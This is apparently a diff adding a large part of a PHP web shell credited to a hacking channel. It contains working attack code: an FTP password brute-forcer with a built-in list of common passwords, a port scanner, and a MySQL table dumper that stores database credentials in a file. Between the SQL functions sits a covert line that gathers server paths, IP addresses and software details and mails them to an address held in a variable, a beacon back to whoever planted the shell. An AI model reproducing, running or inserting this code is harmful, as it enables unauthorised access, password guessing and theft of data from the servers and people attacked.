+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+        
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur numÊrique Á la taille du fichier Á scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure Á 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
